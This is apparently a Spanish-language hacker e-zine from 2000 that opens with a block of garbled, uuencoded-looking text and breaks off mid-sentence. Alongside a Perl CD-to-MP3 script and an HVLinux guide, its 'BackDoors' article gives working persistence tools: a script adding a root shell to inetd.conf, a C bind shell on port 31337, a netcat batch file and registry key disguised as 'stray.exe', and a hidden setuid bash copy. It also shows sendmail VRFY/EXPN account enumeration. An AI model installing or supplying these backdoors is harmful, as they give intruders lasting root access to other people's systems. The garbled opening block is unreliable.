M@@^]_CH9A\SG1_7#&J@+RZ[*3] [http://www.govannom.org/e-zines/hven/hven003.txt][B`?C7!0M*J1IT@>U+G&G^#0F`:JL3OLY)K3
M?M.L@WQ`?GO40"LAC=U>6SM^9"8TPH9.LR^^4W(>G$A@:@>8=:.%86#>-K!T
MZ>'#R2(X5<9->MKC4U!%*[>I.VDL2T7(*\ND:1;\?IH1,H,RN-,72AHXE,;"
M!S^IGXP/K,I1/R#[X?E9@!W+O>EGQ[)NCF7>['UK50Z!_Y.K1H:
MC!4HO'\I3*$/O$;I:Y-W!K]!8&CQZ-,Q!$J2T+EW&2?S'<%
M^*)N'W30W9V=\&QKH,>^[TPZ:M$/";I]9[0H=+8;!S16IG`6H2_%T_\/(=
MOCW\#[Q[^.!S7A\/O>&V/2:3"=JB-HH?T27WI`1*0"D.D\+DI-^2+N1:U@C9
MEA5"IH7W&P5.?T$<4S0@YC6X#0#Q04##B%G0)"/D+KN@NN[X%R3>_W%ZX@P=
M:I2OZR?=<&U,(]0!F!IT8L'W
M>UQ_MK8>$K2`XY3O*6!@I:BW?(H63U_EJZ7^HU2(CV8KKHF]5^(_Z&<
MKJ$CLH{jumi [*3] [http://www.govannom.org/e-zines/hven/hven003.txt]}L\E17H41.(0],1E+.B-._)K?;=0?S5R!%2U7)29;I8(QT,DNL%
MGE8WF,"4Y+/'RDY_S3YK_9&NEU/=9U3H(#NJDE:N*G1
MQ1T$OS"KY`]D@O820F[94%15QXT_Y!(;>Y@BEE"7WU0SDV+8$=%*#E!^_W
MWZZ?U+4G9=C*(*1'7;F[LI?E_B87BC,9G(=^.BF'!AW\%MR7LEO7L8W?VKUS
M9P>T^]W^5.-./P88](A^LW"'@UGAO0O(S_7@2YIAVTHTK$/D#C2]66+`X31?
MD%Y@5HN&GESIZA7I3VM?#]FRH*/=+"P[NKG/26Y';*.%'I!^+30_=NE'ZF:!
MA07S4'^YR20:9X]NCN;`"J0#F_)U7\]GELTBF["MM"#Q#W9R:192U%+(HL
M%+?DCJ=-62[M78G$-!+,4EVW`FF]P?M4UTWE[Z.U-$WMGD]31TU]O4$.LNKK
MA\"#',Y&,@X&;_6T!?2A;S57QQ*ZL35J"*X-T)+36V]>]R:
MI(7=#F?^H`:1">!:>RV#GG.198UX6QGO!V_1P93M4VX:"XKO6F2RP--&@V(R
M%6<:])O@])V'N@"\YO`%HF8-E2<`"FE.OBNUQU]*-44X.URCVH2W&E
MZWM2[B3S"%5OJJMKY7F^IFI=$O@_YNY\+@R)"9+_[9K>IP;81T8+>_=F)]^>
M=F.O*]MA[%WD,+I,!/RR@7PZ@#:0BZ.%D-),D-->>O?.P0]I8IN>T15$ZD8+
MYP7T)C79E7ULH7S_O:]5J8\X=S_>@)^Y763:?"%UU>PV0I/+%5VAW6W?NJO?
MD'<@!DXN1NQLD^J:;O/XX3+$&;<$-HSC+6H0Q\DGJHMFG?2D8N:A#(V`W0T`
M>#@)<$(U?II<(=.A{jumi [*3] [http://www.govannom.org/e-zines/hven/hven003.txt]}VKASM.jumiO(G[Z9%\Q#YJ&>9I)3Z%TC3
MZ<',0;AGK_JU;+Q&D9\`*LY5'Q1N*L\DW9T/YJ
M]8`.:K`L0&?F='F[UY4?_KD1A8,,I&;:_(S8('M,*>,(V5->Q,%M]22G$%<5K\O*0^,=H/@(@R[%H[?RBF`UK(*GFZE>*
M=BV]\'34-W8"?0Y-YNW*I@Y,S\HN"GQW)^_U[>[R=_MV>GT"']C5L94F(OBK
M[^8;.H3G(!Y&]I\]\!!$PZV631PM*PLATD#E@*XWR!L+%#9T74OCQ%C0&WP`
MWF,L`_G7?,%)$OV@]C(++RX^6N[JHV7--)0,M_MH./8KD^W*`S!:`J"%U`4M
MSP&^Q)GKI[Q''`Q/<-EM^"B0/HAL3C?=/`5R-*W>O<^\-(YRC'?
M>?!C3N0W_/0FMG`XGXHHT7]/:%!(_&K/B4#`<#B\"LYJ"EBC3$("C/8`_V".U*3+`SN
M3Q(*G01"PGV1&O)*

Nos vemos luego,

--
  ============================================[]
|| Combel <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >                ||
|| ICQ: 36154455                              ||
|| PGP Key ID: 0x22F66B67                     ||
|| HVen Seguridad -=- http://www.hven.com.ve  ||
|| "Sistemas nuevos generan Problemas Nuevos" ||
[]============================================


   ͻ
͹ MP3-LINUX ͹DoctorX
   ͼ

                        MP3-LINUX
                        por DoctorX <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 > 
                        25/04/2000
        

  Linux es un sistema operativo muy robusto y seguro, pero no solo  esta
  orientado  a servidores  si no  tambien a  estaciones  de trabajo y si
  alguno  de ustedes  es un amante  de la buena musica y de los MP3 este
  documento te puede interesar.

        Que necesito para Escuchar MP3s en mi maquina con Linux?

  Lo primero  que necesitas  es el sistema de  sonido bien configurado y
  ademas  necesitas un programa  reproductor de  MP3s. Para escuchar los
  MP3s les recomiendo XMMS  (Anteriormente conocido
  como X11AMP) que  se  utiliza  desde X-Windows. Puede  ser  que  usted
  necesite un  mixer  para controlar la salida de su  tarjeta de sonido,
  para  esto  les  recomiendo  aumix  y xmixer los   cuales  pueden  ser
  encontrados  en  freshmeat .

        Como convertir las Canciones a Formato MP3?

  Para esto se necesita un programa que lea las pistas de audio de un CD
  y las  transforme  en un archivo  en formato wav usualmente de unos 50
  megas o mas,  una vez convertida  la pista  de audio  a formato WAV se
  necesita un  codificador MP3 para  convertir el  archivo WAV en uno de
  formato comprimido mp3. Para  convertir de  pista  de  audio a  WAV se
  puede utilizar el CDDAWAV que  es un programa capaz de convertir desde
  una hasta todas las pistas de audio  de un CD a WAV, para  ayudarnos a
  automatizar esta tarea un tanto fastidiosa  les dejo  programa en perl
  que realiza la funcion de convertir de audio a WAV:

--------------------- cd2wav ---------------------------------
#!/usr/bin/perl
#
# http://labx.tsx.org  LabX
# cdmp3  v0.1 : Script para Convertir Cds de Audio en MP3
# DoctorX <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
#
# Este programa puede ser distribuido respetando los terminos de
# la licencia GPL
#  Requerimientos : cdda2wav 
use Shell qw( cd cdda2wav bladeenc ) ;

# Total de Canciones a Extraer del CD

$total = $ARGV[0];

# Directorio donde se Grabaran las Canciones en formato WAV

$wavdir = $ARGV[1];
$AUDIO = STEREO ;

# Si no tiene la Unidad de CD con un link a /dev/cdrom
# debe cambiar el dispositivo de la unidad de CD

$CD = "/dev/cdrom";

#

if ($total eq ""){
print " cdmp3 v0.1 by DoctorX  \n";
print " uso : cdmp3 [total_pistas] [wav_dir]\n" ;
exit(0);
}
if ($wavdir ne ""){
print " Cambiando Directorio de Trabajo a $wavdir \n" ;
cd($wavdir);
}

# Procesamiento de Audio

$cancion = 1;
while ($cancion < $total+1) {
print " Convirtiendo Cancion $cancion a formato WAV\n";
$nombre = "cancion$cancion.wav";
$sal = cdda2wav("-D",$CD,"-t",$cancion,"-c",2,"-x",$nombre);
$cancion++;
 }
print " Total de Canciones Convertidas : $cancion \n" ;

--------------------- cd2wav ---------------------------------

  Si no puede hacer usted mismo el trabajo a pie.

  Luego debe convertir los archivos WAV a archivos en formato comprimido
  MP3 y  para  eso  se puede  utilizar  el  programa llamado Blade`s ENC
   y puede  agregar algunas lineas de codigo al
  programa  anterior  y  realizara  la conversion  directa  de cd a MP3,
  usualmente la conversion de pista de audio a WAV es  rapida pero la de
  WAV a MP3 es  lenta. Para que el programa "cd2wav"  convierta a MP3 se
  agrega lo siguiente:

# Conversion a MP3

$cancion = 1 ;
while ($cancion < $total+1){
print " Convirtiendo Cancion $cancion a formato MP3\n";
$nombre = "cancion$cancion.wav";
$sal2 = system("bladeenc  $nombre $nombre".mp3" -br 256000") ;
$cancion++;
}

  Ademas de agregar en la inclusion del modulo de perl Shell el bladeenc
  y quedara algo asi:

use Shell qw( cd cdda2wav bladeenc ) ;

  Para ejecutar este programa en perl se necesita tener instalado en  su
  maquina el cddawav y el bladeenc.


   ͻ
͹ ...BackDoors... ͹Combel - Supreme
   ͼ
                ͻ
                           ...BackDoors...           
                Ķ
                      Combel <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >    
                    Supreme <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >    
                Ķ
                       http://www.hven.com.ve        
                ͼ


 Que son 


  "Puertas Traseras"... Son  programas  dejados  deliberadamente  por un
  admin  o un cracker  para permitir su entrada en casos de emergencia o
  cuando el acceso como  administrador ya haya  sido  cerrado, o sea, se
  utilizan  para poder  conservar los  niveles de  administrador  en una
  maquina.  Aqui  citamos  varios  BackDoors  para  diferentes  sistemas
  operativos.


 Inetd (*NiX) 


  Este  Backdoor  es  muy  sencillo y todas las personas que tengan unos
  conocimientos basicos en Linux deberian entender bien este Backdoor.

  Como todos sabemos linux es un sistema operativo potente con todos los
  hierros =) y por eso tiene una gran flexibilidad en su configuracion.

  Para  los servicios  como Telnet, Finger, FTP, POP3, SMTP, etc. Hay un
  puerto  determinado y esto lo podemos ver en el archivo /etc/services.
  Aqui les pego una parte de mi archivo services:

tcpmux		1/tcp		# TCP port service multiplexer
echo		7/tcp
echo		7/udp
discard		9/tcp		sink null
discard		9/udp		sink null
systat		11/tcp		users
daytime		13/tcp
daytime		13/udp
netstat		15/tcp
qotd		17/tcp		quote
msp		18/tcp		# message send protocol
msp		18/udp		# message send protocol
chargen		19/tcp		ttytst source
chargen		19/udp		ttytst source
ftp-data        20/tcp          # File Transfer [Default Data]
ftp		21/tcp
fsp             21/udp          fspd
ssh             22/tcp
ssh             22/udp
telnet		23/tcp
# 24 - private
smtp		25/tcp		mail
# 26 - unassigned
time		37/tcp		timserver
time		37/udp		timserver
rlp		39/udp		resource	# resource location
nameserver	42/tcp		name		# IEN 116
whois		43/tcp		nicname
domain		53/tcp		nameserver	# name-domain server
domain		53/udp		nameserver
mtp		57/tcp				# deprecated
bootps		67/tcp		# BOOTP server
bootps		67/udp
bootpc		68/tcp		# BOOTP client
bootpc		68/udp
tftp		69/udp
gopher		70/tcp		# Internet Gopher
gopher		70/udp
rje		77/tcp		netrjs
finger		79/tcp
www		80/tcp		http	# WorldWideWeb HTTP
www		80/udp			# HyperText Transfer Protocol
link		87/tcp		ttylink
kerberos	88/tcp		krb5	# Kerberos v5
kerberos	88/udp
supdup		95/tcp
midinet         40001/tcp	midinetd
# 100 - reserved
hostnames	101/tcp		hostname	# usually from sri-nic
iso-tsap	102/tcp		tsap		# part of ISODE.
csnet-ns	105/tcp		cso-ns	# also used by CSO name server
csnet-ns	105/udp		cso-ns
rtelnet		107/tcp		# Remote Telnet
rtelnet		107/udp
pop2		109/tcp		postoffice	# POP version 2
pop2		109/udp
pop3		110/tcp		# POP version 3
pop3		110/udp
sunrpc		111/tcp
sunrpc		111/udp
auth		113/tcp		tap ident authentication
sftp		115/tcp
uucp-path	117/tcp
nntp		119/tcp		readnews untp	# USENET News Transfer Protocol
ntp		123/tcp
ntp		123/udp				# Network Time Protocol
netbios-ns	137/tcp				# NETBIOS Name Service
netbios-ns	137/udp
netbios-dgm	138/tcp				# NETBIOS Datagram Service
netbios-dgm	138/udp
netbios-ssn	139/tcp				# NETBIOS session service


  Podemos  ver  que  este archivo  se compone  del nombre del  servicio,
  puerto,  protocolo (Si es tcp o udp) y lo que esta despues del # es un
  comentario que hacemos sobre el puerto.. Para hacer el Backdoor lo que
  tenemos  que hacer es  poner en  cualquier  parte  de este  archivo lo
  siguiente:

nombre_que_le_queramos_dar      puerto/tcp      #comentario (no es nesesario)

  Quedaria algo como:

HVen    31337/tcp       #Nuestra Backdoor

  Claro que  podemos  usar cualquiera  de los puertos  que ya tiene este
  archivo  para colocar  nuestra  backdoor  y seria  hasta mejor ya  que
  genera menos sospecha.                                                           

  Ahora despues que sabemos el  puerto que queremos usar, tenemos que ir
  al  archivo /etc/inetd.conf y editarlo; aqui  les  pego  la  linea del
  Telnet y del FTP de mi inetd.conf:

ftp	stream	tcp	nowait	root	/usr/sbin/tcpd	wu.ftpd -a

telnet	stream	tcp	nowait	root	/usr/sbin/tcpd	in.telnetd

  Para nuestra backdoor tendremos que colocar lo siguiente:

HVen    stream  tcp     nowait  root    /bin/sh sh      -i

  Aqui lo que  le decimos  es que cuando halla una conexion en el puerto
  que hemos asignado en este caso HVen:31337 ejecute un shell de root.

  Luego solamente tenemos que matar al Inetd poniendo kill -HUP desde el
  Shell y listo.

  Tambien  podemos  crear  un Shell Script para hacernos la vida un poco
  mas facil... este Shell Script es muy  sencillo y solo le  decimos que
  guarde  una  linea  en inetd.conf y ejecute  inetd. He  aqui el  Shell
  Script de Combel:

<-- EMPIEZA AQUi -->
#!/bin/bash
# Hackers Venezuela - http://www.hven.com.ve
# HB-iBD v1.2
# =================================================
# Por Combel {
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 }
#
# Este es un sencillo Shell Script que hice para implementar el BackDoor
# de inetd en localhost. Realizado el 21/01/Y2K. Revisado por ultima vez el
# 24/01/Y2K.
# NOTA: Debes ser root para colocar esto (Por favor...)!!!
#
# Inicio
echo "HB-iBD v1.2 -=- Por Combel {
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 }"
echo "============================================="
echo "Especifique el puerto para colocar el BackDoor:"
PUERTO=
read PUERTO
echo "Se utilizara el puerto # $PUERTO"
echo
echo "Now is the time!!!"
echo
# Inclusion de Saltos de Linea para evitar problemas.
echo >>/etc/services
echo >>/etc/inetd.conf
# Inclusion de lineas.
echo "ibd                $PUERTO/tcp             #ib daemon" >>/etc/services
echo "ibd     stream/tcp    nowait root  /bin/sh sh -i" >>/etc/inetd.conf
# Ahora se matara al inetd!
killall inetd >/dev/null
# Y ahora se reinicia
inetd >/dev/null
echo "Haga telnet al puerto $PUERTO y compruebe."
PUERTO=
# EOF
<-- TERMINA AQUi -->

  Un simple  Shell Script... pero hay  que tener en cuenta que cuando le
  coloquemos   el  puerto, tiene  que   ser  uno  que   no  este  en  el
  /etc/services ya que puede  crear conflictos, tambien se aconseja  que
  estos  puertos  sean  puertos  altos  como 32768 para  que no escaneen
  facilmente.

  Bueno hasta aqui  llega esto y espero que les sea de ayuda. Si todavia
  no  tienen  Linux  y quieren  entrar  en  el  mundo  de  este  sistema
  operativo, bajense HVLinux en http://hvlinux.tsx.org.

  Ahora aqui hay un Backdoor que hace algo muy parecido a lo del Inetd.


 Un Backdoor parecido al Inetd (*NiX) 

<-- EMPIEZA AQUi -->
/* quick thingy... bind a shell to a socket... defaults to port 31337 */
/* code by 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
                                              */
/* don't forget.. when you connect to the port.. commands are like:   */
/* "ls -l;" or "exit;" (don't forget the ';')                         */

#define PORT 31337 
#include 
#include 
#include 
#include 
#include 

int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr; 
struct sockaddr_in client_addr;

int main () 
{ 
    soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 
    if (soc_des == -1) 
        exit(-1); 
    bzero((char *) &serv_addr, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET; 
    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    serv_addr.sin_port = htons(PORT);
    soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
    if (soc_rc != 0) 
        exit(-1); 
    if (fork() != 0) 
        exit(0); 
    setpgrp();  
    signal(SIGHUP, SIG_IGN); 
    if (fork() != 0) 
        exit(0); 
    soc_rc = listen(soc_des, 5);
    if (soc_rc != 0) 
        exit(0); 
    while (1) { 
        soc_len = sizeof(client_addr);
        soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
        if (soc_cli < 0) 
            exit(0); 
        cli_pid = getpid(); 
        server_pid = fork(); 
        if (server_pid != 0) { 
            dup2(soc_cli,0); 
            dup2(soc_cli,1); 
            dup2(soc_cli,2);
            execl("/bin/sh","sh",(char *)0); 
            close(soc_cli); 
            exit(0); 
        } 
    close(soc_cli);
    }
}
<-- TERMINA AQUi -->


  Bueno  cuando  compilemos  esto, lo  corremos  y  ya  tenemos  nuestra
  Backdoor en el puerto que especifiquemos... Para especificar el puerto
  hay que editar la linea donde dice:

#define PORT 31337 

  Y ponemos  el  puerto  que  queremos.. si no  lo editamos tendremos la
  Backdoor en el puerto default que es 31337.

  Tambien  encontraran  un  archivo  que  se  llama  portd.c que es algo
  parecido a esto pero con Password.

  En  este  archivo  para  poner  el  Password que querramos tenemos que
  editar la linea:

#define    MY_PASSWORD    "wank"

  Y remplazamos wank y ponemos nuestro password

  Para ponerlo en el puerto que querramos tambien editamos la linea:

#define    SERV_TCP_PORT  2400    /* port I'll listen for connections on */

  Cambiando en donde dice 2400 por el puerto.


 WNBD (Win9X) 


  Esto  no es mas que un ejemplito sencillo para programar BackDoors con
  el  NetCat  para Windows, es un programa relativamente tonto, y por lo
  general  no  funciona en ciertas maquinas, pero es solo un ejemplo. En
  si lo que hace es poner una llave en el Registro del Sistema en:

HKEY_Local_Machine\Software\Microsoft\Windows\CurrentVersion\RunServices

  De  manera  que  cada vez que se  inicie la maquina Windoze se cargara
  NetCat =D.
   
  Lo hice  para  que sea lo mas  facil de  usar  posible =D. Simplemente
  desde tu shell de DOS colocas asi:

C:\>hv-wnbd {localizacion de nc.exe}

  Ejemplo:

C:\>hv-wnbd c:\nc\nc.exe

  Y ya. Debes tener en cuenta que los archivos HV-WNBD.BAT y HV-WNBD.REG
  deben  estar  en el mismo directorio. Se que muy bien pude haber hecho
  al WNBD de manera que el mismo creara el .REG con el comando ECHO pero
  lo intente y  no me  funciono asi  que tendremos  que ir utilizando el
  .REG que incluyo mas abajo.

   ...El Batch en Cuestion...

   Otra cosa, antes de que se me olvide, esto es solo un ejemplillo del uso
   de NetCat ... y he escuchado que a mas de uno no le sirve ... es logico,
   de todas maneras acepto comentarios constructivos.


@echo Off
:: 
:: Hackers Venezuela = http://www.hven.com.ve
:: + HV-WNBD v1.2 +
:: Para Wind0ze '9X
:: Escrito por Combel {
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 }
:: 
::
:: [ Explicacion Breve ]
::   ~~~~~~~~~~~~~~~~~
::   Esto es un sencillo BatchFile para hacer que NetCat abra el puerto 4096
:: ejecutando el Shell de DOS por defecto en la variable COMSPEC.
:: Ademas de abrir el puerto a~ade una llave al registro localizada en
:: HKEY_Local_Machine\Software\Microsoft\Windows\CurrentVersion\RunServices
:: para permitir que se cargue NetCat cada vez que se inicie Wind0ze.
::
:: -*- Inicio -*-
::

if "%1"=="" goto :ayuda
if not "%2"=="" goto :ayuda
if not "%3"=="" goto :ayuda
if not "%4"=="" goto :ayuda
if not "%5"=="" goto :ayuda
if not "%6"=="" goto :ayuda
if not "%7"=="" goto :ayuda
if not "%8"=="" goto :ayuda
if not "%9"=="" goto :ayuda

if not exist hv-wnbd.reg goto :error
if not exist %1 goto :error

:corre
echo 
echo Hackers Venezuela = http://www.hven.com.ve
echo + HV-WNBD v1.2 +
echo Para Wind0ze '9X
echo Escrito por Combel {
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 }
echo 
echo.
echo Implementando el BackDoor.
Copy %1 %WINDIR%\COMMAND\stray.exe >nul
Stray -L -p 4096 -t -e %COMSPEC% -d
Stray -z -vv localhost 4096
echo A~adiendo la llave al registro.
start /m regedit hv-wnbd.reg
echo ...Finalizado...
goto fin

:ayuda
echo 
echo Hackers Venezuela = http://www.hven.com.ve
echo + HV-WNBD v1.2 +
echo Para Wind0ze '9X
echo Escrito por Combel {
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 }
echo 
echo.
echo Utilizacion.
echo %0 [Ubicacion de NC.EXE]
echo.
echo Ejemplo: %0 C:\nc\nc.exe
goto fin

:error
echo 
echo Hackers Venezuela = http://www.hven.com.ve
echo + HV-WNBD v1.2 +
echo Para Wind0ze '9X
echo Escrito por Combel {
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 }
echo 
echo.
echo Error
echo Algunos archivos faltan. Asegurate de la existencia de:
echo %NetCat%
echo HV-WNBD.REG
goto fin

:fin


   ...Y el archivo .REG ( Debe llamarse HV-WNBD.REG )...


REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
"WNBD"="Start /m Stray -L -p 4096 -t -e %COMSPEC% -d"



  Para remover el WNBD puedes:

  > Eliminar  la  llave  en  el  registro  de  windows  mediante regedit
    localizada en HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
    \CurrentVersion\RunServices llamada "WNBD".

  > Eliminar  el ejecutable  de NetCat que esta en el directorio COMMAND
    de Windows con el nombre Stray.exe


 Copiando la Shell del Admin (*NiX 


  Cualquiera  dice  que  el  implementar esto es una  pendejada, pero en
  realidad  funciona. Consiste  en copiar una shell y colocarle permisos
  de Administrador  para que nosotros la podamos  correr como un usuario
  normal y tengamos de una vez el root.

   - La Practica -

[root@HighPoint root]# cd /bin
[root@HighPoint bin]# cp bash .chf <- Copia la Shell del Admin.
[root@HighPoint bin]# chmod 4755 .chf <- Colocarle Permisos.

  Eso es todo! Ahora...

[combel@HighPoint combel]$ /bin/.chf
[combel@HighPoint combel]$ whoami
                           root <-- ]=D.

  Bueno, hace  dias  me di  cuenta  que  tambien  sirve haciendo un link
  simbolico  asi  que  se puede  utilizar  "ln -s bash .chf" aunque  los
  resultados seran los mismos.

  Defecto No. 1 y mas grande de este BackDoor: cualquier  usuario que lo 
  logre  encontrar  y lo  ejecute  tendra el root en sus manos. Creo que
  esto se puede  corregir, existen varios  programas sencillos en C para
  ponerle  passwd  y  otras  cosas  por el estilo, solo es  cuestion  de
  buscar.

  Como  Remover  el BackDoor? Pues, Eliminando  la  copia del Shell =D.
  Logico.




  Bueno, este  texto  se  ha  terminado... Esperamos  que  haya  sido de
  utilidad.  Ahora, que  mas queda... Agradecimientos  a SickBoy  por su
  ayuda con respecto a la Backdoor de Inetd.

                Combel  <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
                Supreme <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >

                (C) 2000 HVen Seguridad.

                        <-- EOF -->


   ͻ
͹ Tips para entretener a la masa mundana ͹Teken Melocotoff
   ͼ

Tips para entretener a la masa mundana.
Teken Melocotoff
03/27/00

  ***********************************************************************
  TODA LA INFORMACION QUE APAREZCA AQUI ES SOLO PARA USOS 
  EDUCACIONALES, Y NI EL AUTOR DEL DOCUMENTO, NI EL 
  RESPONSABLE DEL WEBSITE, SE HARAN RESPONSABLE DE 
  CUALQUIERA ACCION QUE TOMEN. LA RESPONSABILIDAD DE SUS 
  ACCIONES CAE UNICAMENTE EN EL LECTOR/USUARIO DE ESTE 
  DOCUMENTO...BLA BLA BLA.. ENFIN, LA IDEA ES QUE SI SE LA CAGAN, 
  NO VENGAN A JODER ACA, SAQUENSE EL DEDO USTEDES 
  MISMOS...ETC,ETC.
  ***********************************************************************

  Que tal gente, como les va, hoy vamos a jugar un poco mas con sendmail
  y sus derechos de poder conectarse a Internet el resto de sus vidas! 

  La  verdad  vamos a  discutir  un par de  comandos  de nuestro demonio
  favorito, sendmail. Ahora  lean la oracion previa. Si? Ya? Leanla otra
  vez. Fijense muuuuuuuuuuuuuy bien.  Ok? No quiero preguntas mas tarde,
  no se va explicar mas nada, craneen y no sean tan .......como son.

  Ok primero planteamos una situacion. Veras alguien se puso a jugar con
  el fakemail y te mando un fakemail, muy bien hecho por ellos, hasta se
  merecen un premio. Pero cuando  orgullosamente  presentas la evidencia
  del fakemail a sysadmin, este te mira como diciendo "awebao que seras"
  y te contesta que no hay tal cuenta en su servidor. Coe, todo mordido.

  Como poder verificar  que cuando te mandan un email, y piensas que haz
  encontrado la direccion originaria, como verificar?

  Ahhhh para todo aquellos  amiguitos que se han dedicado a leer el help
  del demonio, se  percataran que hay  un comando que dice VRFY. Para el
  que  no  la haya captado, VRFY es  foneticamente  similar a la palabra
  anglosajona VERIFY, que en  castellano bien dicho y hablado  significa
  verificar. Como usarlo?  Facil, ya  todos  sabemos  como  encontrar un
  username en un email no? No? Pues lean las versiones anteriores de los
  ezines, y  leanse  un  par de  documentos  o txts. Eso  aclarado  solo
  introduce  el  comando  VRFY  al  demonio  con  el  username  que debe
  verificar. (la siguiente informacion ha sido modificada)

220 xxx.xxx.net.xx ESMTP Server (Post.Office v3.5.3 release 223 ID# 123-45678U11
555L1150S0V36) ready Mon, 27 Mar 2000 02:08:17 -0500
vrfy username
250  Ok

  A que lindo, miren, la cuenta  si existe en  este servidor, pues ahora
  tan siquiera hemos confirmado que la cuenta existe y que si, si reside
  en este servidor. Tan siquiera hemos  asegurado eso (quien  sabe si en
  realidad el coreo salio de aqui, eso ya son otros 500 pesos).
 
  Pero  que  tal  un poco  mas de  info  sobre esta  cuenta? A vamos con
  nuestro fiel demonio  finger, y que mas, este nos dice que nos vayamos
  a rascarle el trasero a un gorrilla. Que  webo! Demonios!  Weno que se
  hace? Se sigue hurgando el lindo demonio sendmail, que por ser tan feo
  y  engorroso  de   configurar   es  que   hay  tantos  hoyos  de  cual
  aprovecharnos.

  Esta  vez  hacemos  uso del comando EXPN que es fonetica...blah blah =
  Expand = expandir. Captan? Esto expande la informacion de un username.
  Se usa igualito que el VRFY

220 xxx.xxx.net.xx ESMTP server (Post.Office v3.5.3 release 223 ID# 123-45678U11
555L1150S0V36) ready Mon, 27 Mar 2000 02:12:36 -0500

expn username
250 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
  ( Nombre del due~o de la cuenta)

  Perfecto! Ahora, yo  se  que lo  hice bien claro arriba, pero para los
  que no captaron les explico ciertas cosas:

  1. Primero  que  todo  esto  no  garantiza  que  hayas  encontrado  al
     culpable,  garantiza  que   encontraste  una  de  la(s)  posible(s)
     cuenta(s) real(es) que pudo haber usado el individuo.

  2. Ninguno de los anteriores es un bug, es un  comando incluido  en el
     sendmail.

  3. No garantizo en ningun momento que funcione en todos los servidores
     ya que  hay algunos  sysadmin que  saben lo que hacen, otros que no
     saben lo que hace, y otros que les vale mierda lo que hagan.

  4. Hacer  esto  puede  kbriar  a tu sysadmin y esta en todo derecho de
     hacer lo que le pike en gana con tu cuenta.
  
       Escojamos. Seremos lobo, oveja, u pastor.                        


   ͻ
͹ Proyecto HVLinux ͹DoctorX
   ͼ

         ===============================================
         =             Proyecto  HVLinux               =
         =           http://hvlinux.tsx.org            =
         ===============================================


  Tabla de Contenido

  1. Prefacio
  1.2 Agradecimientos
  1.3 Links de Interes

  2. Introduccion
  2.1 HVLinux
  2.2 Filosofia del Proyecto
  2.3 Versiones Disponibles

  3. Donde Obtener HVLinux
  3.1 Realizar Aportes
  3.2 Reportar Bugs  

  4. Instalacion 
  4.1 Creacion de Disco BOOT
  4.2 Creacion de Disco ROOT
  4.3 Agregar Programas o Paquetes

  5. Hacking HVLinux

  Creado el : 12/03/2000
  Autor     : DX <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >

        1. Prefacio

  Este documento  esta disponible en  formato de texto, html y ps. Usted
  puede elegir el formato que mas le guste. 

  El trabajo  realizado  por mi para  la creacion de este documento sera
  actualizado  cada  vez  que  se  lance  una  nueva   version  de  esta
  distribucion y estara disponible en:
  http://www.hven.com.ve/linux/hvlinux/docs.


        1.1 Agradecimientos

  Quiero  agradecer a la gente que  de una forma u otra a colaborado con
  el proyecto,  especialmente a los  miembros del grupo de discusion  en
  onelist <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >.

  Un saludo a la gente de HVen, amigos siempre, principalmente a:

  Kliber    <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >     ----------- HOT DOGS MANAGER
  DarkDeath <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >  ----------- Lainuz
  Dunkel    <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >----------- Ulcera
  MHVSS     <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >      ----------- MalKavian
  Drake     <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >      ----------- PIC_MAN
  Merlin    <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >     ----------- Smoke

  los amigos en REDUC:

  Eduardo <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >      ------------ LEntes
  Ernesto <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >       ------------ RBCOP
  Jose D. <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >      ------------ Yoda :-)

  Amigos en VELUG:

  Alvaro Hernandez <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 > --- PHP_MAN

  y los otros que no recuerdo.


  1.2 Links de Interes

  Esta es una lista de sitios web con informacion relacionada  con linux
  que podria ser util.

http://hvlinux.tsx.org          HVLinux
http://www.hven.com.ve          HVen
http://linux.org.ve             VELUG
http://www.linuxpreview.org     Linux Preview
http://metalab.unc.edu/LDP      Linux Documentation Project
http://linux.box.sk             LINUX.BOX

 
        2.Introduccion

  Este  documento  tiene por  objeto  es dar  una  idea  al lector sobre
